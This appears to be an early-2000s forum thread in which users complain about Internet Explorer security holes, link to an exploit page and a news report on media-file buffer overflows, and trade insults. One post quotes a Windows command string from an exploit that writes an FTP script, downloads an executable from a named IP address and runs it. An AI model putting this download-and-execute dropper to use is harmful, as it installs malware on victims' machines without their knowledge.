yet another exploit

[anphanax]

http://unsecured.netfirms.com/exploit.jpg

this doesn't work with Mozilla or Netscape
But it sure as hell does with MSIE

Edit: Isn't it amazing how MSIE will just let you
use any extension for HTML files. I wander if
this little bug has some my computer zone
privledges. That would be funny and devestating
if someone played around with VBScript in this
way.

As a side not, similar to MS, of course America
Online has yet another problem, this one
involving punters:
www.xeons.net (sad, but as form of proof)

New Edit:
http://www.zeropaid.com/news/articles/auto/12182002g.php
apparently windows users also get to deal with
buffer overflow errors regarding "oversized"
mp3s and wmv files. I noticed their PNG thing
as well, and I have seen how MSIE doesn't always
handle them properly anyways, but THIS IS
PATHETIC.. And now windows xp users must wait
until MS patches this. (If they haven't already)
Note article dating: December 18, 2002, 5:12 PM PT

[ December 29, 2002: Message edited by: anphanax ]

[Calum]

article from pcgames.de

Not quite so bad, just another article about microsoft's swiss cheese shaped software.

[ January 03, 2003: Message edited by: Calum ]

[ January 04, 2003: Message edited by: Calum ]

[Gooseberry Clock]

Let's see how long it takes them to bust this guy.

[Calum]

what guy, fuckass?

[Gooseberry Clock]

quote:args = '/c echo o 141.156.185.80> c:/windows/ftp.txt & '+
 'echo user anonymous>> c:/windows/ftp.txt & '+
 'echo anonymous@anonymous>> c:/windows/ftp.txt & '+
 'echo get /fun.exe c:/windows/taskdl.exe>> c:/windows/ftp.txt & '+
 'echo quit>> c:/windows/ftp.txt & '+
 'ftp -i -n -v -s:c:/windows/ftp.txt & '+
 'c:/windows/taskdl.exe';

His IP is clearly visible in the unescaped code.

[Calum]

oh okay, didn't realise who you were talking about...